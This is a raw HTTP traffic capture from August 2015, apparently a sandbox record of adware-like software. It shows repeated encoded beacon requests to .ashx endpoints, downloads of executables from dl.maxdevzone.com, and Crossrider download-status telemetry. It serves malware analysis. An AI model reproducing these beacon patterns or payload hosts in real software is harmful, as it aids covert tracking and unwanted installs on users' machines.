GET /27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMBHkkQ8dewzaRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyTurUOoOhKHAWZuVwyMddF8BgyCi5mlJL HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=043Mckb8Lnhw7iCtSAyu/0Q1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePEEASnTAt8o vdWl3XnoKt0JQd5HxgIXd4Ck/GAouPo3pu1a2/pSyUlKYWIS4b/TwQz5kcPJsPBXgEPYkm2R 4CM84BubBye2orW/U9pNYEne5haHOFLYKd5SlKONgbzwnZSRpvuXhKkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMC09xUUAqoccNCUHeR8YCF3RMhMhveZGB/8e7kw1yV54DHh RP9FBwluXtX58AbVGLqY0nw4ErLtxha/ J3llgZ187AT1rhu GGW2I O4PkTUw1aLHDaMdxJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovfwqbgkyABd HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF1B5eyhynK5il gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBd7kwVzNWOrfuirThnOyWCqILJt Jqyltk= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF0vmoXMQKU1KtudqV021AKZU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjxBAEp0wLfKOcXM978RrvxgTxIUcsgQ w0eteH8KxBtakHX utQO2t7GJ7NLKRj9nU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1mzeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuY hmSQlakOO/yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHiddP9Uf4p/RQ UMx9TNBbmkTjcSbV/8/K3y93eDbW4 bAU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=N6dOqWm8Q95rOakOyNRzsN5jOExRmJjcpL1q0D3vvXQ2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo0ATae6NSkcvIROPie2z40 X0A62pnUj3KYX3Ti/i3YOBks urBi 1VbQfHq0QVBDarxXN1e/eRVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXe5MFczVjq37oq04ZzslgqiCybfiaspbZ HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=c0XmKevqA0lENRlsCDLYcGeakDLP0HwkgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEdPIgADxit2gnbJKYwPfuhCWcSucRpHa5xQC drCF7eFc68xQtOPoFeZZ3F95gs6nEVdjbbwQnHyVtB8erRBUENoBUzXpAW/ CSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=W5y9y1UrGBkT/daslwwbUi1X0eix9R7PaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFaACykertHSFfOKWYd4uGNAB/MXM5vy8Es IILilpWF3E4CvODJISMmgJ1E0DOBKFm3OtmTG7fpbuOInD4IpbV04k1C4lssAWX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=Feo0TQZfu6KSwU3ck0YwnkQ1GWwIMthwsNv oCoFDuAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRbrsFepywjbPfV9OCtHXZfA3mXJEY39mHAhwsRGINruhhsseF9XKGr8l4l5 9UEJ lex/kVKG eu03e5/1jzsDq/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGd51jxu8kbC2zsHlRkWrcy9e991jqD0JbjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2AUI/TbDoS6cQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:29 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=2fVCHF6kf8jCiOnT8Um5ot5jOExRmJjcwBNQmbxWl5I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRoA0zlVyT prKPFGXl7hYw KKij 6dP1w7xUocEPa3glNDBcek3F/63nckoxBum7JNDqm5t3h0H90W4JQdY9P0gBy5EtCsvUaNdTeugB sfRAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:29 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=1ZEnpGuz/ISSsSz5Gin3Vt5jOExRmJjc8f9/KvgcVLM2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRopynfaNYH8L/fV9OCtHXZfA3mXJEY39mHAhwsRGINrujU8aLWOIyJUH8YWruN4e6MEbymkiujpsVTxWhzXOleYJkIdnqYjudekgj0wc9eDMUnCmQO3a9dMJOXaRLeTy 6CAOOMT3NqqJO9TngHSIOj44034t1Q4pu3fndBZnH/Wk11N66AH6x9ECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:31 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=ZfTZC8DxP8YF7tXbo2OpjW4qNgpZFK9FKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOObhfXDxmrTSK7QblguX5JvoeC1e2SDVtV0Et4u7lqt3sALWQVKcMZfCF1xI06rglXZ6Eeh5vZKO2eqfOL09Waq7Jn1GegIILyOsrHZsRsIfMRhg0WUsz0Xly/L51iHZ9r5N1eAbd3t0uTl0SfHFTsacMteo8rnbW10COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /app/ping.ashx?e=KC52kqqAunAF7tXbo2OpjYavQM3IkVbX2YTeaOaZJPFysSIQM/WMqhsgZm851Wm705cEc0dFwLhTxWhzXOleYCZCp63jGZtjv06NRyXKgtkdRS7ocO43fkEXlTeNLX sfKwlC2TeCg7lnoGCEF1IIyQxWeZ2hMdUZrdGZ5CXclVTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSsk7q1DqDoShwFmblcMjHXRdicB7EPPnRdOUS4717SFgKd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:33 GMT
Content-Length: 0
....



GET /app/ping.ashx?e=2UW/O98m6H8F7tXbo2OpjW0n2MBpLjeO2YTeaOaZJPFysSIQM/WMqhsgZm851Wm705cEc0dFwLhTxWhzXOleYCZCp63jGZtjv06NRyXKgtnU2Z1SyzBY81o8H6qezB8RqTFlxlzn4VKX1U8GGWeNj61SjtAHPTC3QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiYoYL3r 4idOA8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb6QG6vuKMEZ8b/AUix4dIkZvQPHab7QXjtoXNw24za1vD4WpTRkXhg7nV3/LPfa2aq5oeRu5C4CqkWleu6Ut5wZJLhm4jKngLIPSVmnMg23wA= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:34 GMT
Content-Length: 0
....



GET /app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2WadpT4UtSGCs4164GCUCrHofaoyXCfoQHfnxDGMvPkm88zk3vjcmKS6F3bO0r3toDYVc3vn XSLjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsNd jErBGkiDqZpQuUsyuErvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qJg4GZE0lzROYY2d48H/jH53sGqR1dd1 CYgbDq2EyqHZXiNwermIPJaqcLsqnN14kxDoAIuanBxUzm JXfFf4aShZXLko8QlU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:35 GMT
Content-Length: 0
....



GET /app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2TQDvlMwbi/4Fsp1Rvh9JTeKcWyRatcCZS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VC51CUbXbhryEU5MDCXDxgXe5MFczVjq37oq04ZzslgqiCybfiaspbZo2Pjw4zIP8Koiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:35 GMT
Content-Length: 0


GET /spdbt/shoppy/snsch7.exe_a HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache




<<< skipped >>>

GET /web/gf/all/setup.exe_d HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:25 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433377"
Last-Modified: Thu, 13 Aug 2015 02:36:17 GMT
Cache-Control: max-age=1268
Content-Length: 2124006
Content-Type: text/plain
X-HW: 1439464766.dop002.am4.t,1439464765.cds048.am4.c

<<< skipped >>>

GET /utility.gif?report=fdata&f=3&c=1729&i=10&n=ms_started&rnd=19871 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:21 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /utility.gif?report=fdata&f=3&c=803&i=35&n=ms_about_to_exc&rnd=25324 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:31 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /utility.gif?report=fdata&f=3&c=1729&i=20&n=ms_start_download&rnd=16011 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:22 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /10266.ashx?e=NdvkYMTo1KsT/daslwwbUrln8Tc7JdzDaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLxpJZRDiatLLr8onAm2k8 UCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOuOY6cLwcbD07lG1xkeY5jbRwdqu9soHjYgwamV62X9gO95zWp5ecIePiKgomzd5XT9xoSCfVrLCPk3SNaw1Hwyh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHnrErQ9Bnn0aGNDEgQGSeDWcuFD/oqMC4ywj137NFRjrrStcIq/vZyTdriV4mPeB3fQbFCQv5BK9FdmE/yeJSe6i5CWtbGsRuHfTuvFpnVrlF9LGvMrDlXCLGhXnLEz5pbP YAvZ/SRS XEWbcA1chWcCJK1OHTiKZmXIkKgXd7TGpnBktR0W195FKDVXPs8UDrf7gVRTtqGyUpmLFbLFiWF8xS3bBaukC3g671NSdAWbPZE8t0P6yGa vpLH0m0oO jwDV6udpLox4w9PSLDKW3MoS/fu50NKaR9WivOCmrDK2XoJ06HUM62z6JB0wq6Xw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:29 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /spdbt/shoppy/snsch7.exe_d HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache




<<< skipped >>>

GET /27136.ashx?e=bNFVvuIwcz4F7tXbo2OpjbeGOAxO2gKXKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMY3q3Uh zLol JfVwpv1Wv16XIqLxILHtgx1Ht egA6cURUFmYOWrgEoo okeITCw2Yh 7VFNWqMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=bNFVvuIwcz4F7tXbo2OpjbeGOAxO2gKXKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMY3q3Uh zLol JfVwpv1Wv16XIqLxILHtgx1Ht egA6a3os1yMNpRFGzy5vsTaNP0Nk8MlICEx8OzO9WsNY04szUJdC7lWxx5CAq2jnzLstq5zRXoJTpQbEJGlPGkXT zLSflwInKoSsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=LCnUzM5l8JKBkxMrsxJdJt5jOExRmJjc8lXlmdaIM2I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo74r1XQZFERKtK2nLIJE3nATxIUcsgQ witsIrAYx7ljhVOZjHwNmMDyjESsfx8vmmA9cYundBgRv3w3Jj7cm/ gp01/jAfMwbSGNlrViJV74d 8wlC3ACe dC6ehZq jU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeOeKyAVWvB29uUFvnzEUAw6Bvyoe0Pz471eJrDcTa7BC1GOPVXIjHvBX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePFASu7RG65lJccV0JiYKAXBPEhRyyBD7BWRKLvFc2rIXiEA2WeFUVr213KsnHgPGCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVQ6A hJB6uhJAw85hRFS7YBQj9NsOhLpx HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



